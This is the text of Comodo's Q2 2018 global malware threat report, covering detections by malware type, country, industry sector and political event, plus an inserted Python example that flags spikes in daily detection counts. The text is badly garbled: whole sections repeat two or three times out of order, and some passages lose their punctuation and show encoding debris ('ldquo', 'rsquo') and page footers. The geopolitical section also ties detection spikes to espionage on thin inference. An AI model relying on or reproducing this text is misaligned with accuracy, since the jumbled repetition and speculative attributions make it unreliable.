This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the #1 malware family for each vertical's top malware type.
Let us take a closer look at two Trojans, Kryptik and Zbot, that were the top detections not in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but can now also target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a Trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.
In conclusion, Trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Further, strategic analysis like this can be used to build a unique malware profile for each vertical, providing cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out. What happened on that day in the US that might help explain the surge in malware activity? On March 13 US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, and immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
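Every subsection that follows starts from a day that "stands out" on a detection timeline. Picking such days out reproducibly, rather than by eye, is the part of this analysis a practitioner can automate. The code below is an added example written for this page, not the report's own method: it scores each day with a modified z-score built from the median and the median absolute deviation (MAD), so that one enormous day does not inflate its own baseline the way a mean and standard deviation would. The daily counts are constructed for the example and are not Comodo telemetry. Before reading a geopolitical cause into a flagged day, rule out sensor-side explanations first (a new customer deployment, a signature update, a collection outage ending), which produce exactly the same shape.

```python
"""Flag single-day spikes in a daily detection series. Added example, not the
report's method. Uses median and MAD (a robust spread estimate) so an outlier
cannot mask itself by widening its own baseline. Sample counts are constructed."""
from datetime import date, timedelta
from statistics import median

MAD_SCALE = 0.6745   # makes MAD comparable to a standard deviation for normal data


def modified_z_scores(counts):
    """One score per day. A perfectly flat baseline (MAD == 0) would divide by
    zero, so any deviation from the median is scored +/-inf and still reported."""
    med = median(counts)
    mad = median(abs(x - med) for x in counts)
    scores = []
    for x in counts:
        if mad == 0:
            scores.append(0.0 if x == med else (float("inf") if x > med else float("-inf")))
        else:
            scores.append(MAD_SCALE * (x - med) / mad)
    return scores


def find_spikes(counts, start: date, threshold: float = 5.0):
    """Return [(date, count, score)] for days whose score exceeds threshold.
    Only upward deviations count: a quiet day is not a spike."""
    out = []
    for i, (x, s) in enumerate(zip(counts, modified_z_scores(counts))):
        if s > threshold:
            out.append((start + timedelta(days=i), x, round(s, 1)))
    return out


# Constructed daily detection counts for a 30-day window starting 2018-04-01:
# a baseline near 100 with one day nine times higher.
SAMPLE_COUNTS = [100, 104, 97, 101, 99, 103, 98, 102, 100, 96,
                 105, 99, 101, 900, 98, 102, 100, 103, 97, 99,
                 101, 104, 98, 100, 102, 99, 103, 97, 101, 100]
SAMPLE_START = date(2018, 4, 1)

if __name__ == "__main__":
    for day, n, score in find_spikes(SAMPLE_COUNTS, SAMPLE_START):
        print(f"{day.isoformat()}: {n} detections (score {score})")
```

With a mean-based z-score the same series gives the 900-count day a score of only about 5.3, because the outlier drags the standard deviation up to roughly 145; the MAD-based score is over 260, and the ordinary days stay below 2. The threshold of 5 is an assumption to tune against your own telemetry, and a rolling window (for example the trailing 28 days) should replace the whole-series median once the series is long enough to have seasonality.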
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is likely that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo Trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to better connect with the outside world. Comodo researched the detected malware further and identified it as Windows activation ("cracking") software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security, are now mostly conducted online. This is especially true during a national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both Viruses and Trojans. It is possible that the Virus outbreak was used specifically to disseminate Trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been several reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting: it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let us look at Comodo's Virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this Virus activity revealed that it took place almost exclusively in Vantaa, a suburb of Helsinki, which is precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The increase in Trojan malware last quarter suggests that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the industry should assume that many Trojan-based attacks that occurred in Q2 remain undetected, with their real impact to be revealed in quarters to come. Another meaningful fact is that Trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools such as PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to desktop systems, which presages new attacks and new mobile malware. As more people use mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (messenger correspondence, private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of Trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals are increasingly hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and posture.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
5.1.3 Email Worms
Email worms spread by mailing copies of themselves, and they are nasty in that they can also travel between victim computers by other means, for example via exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Further, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
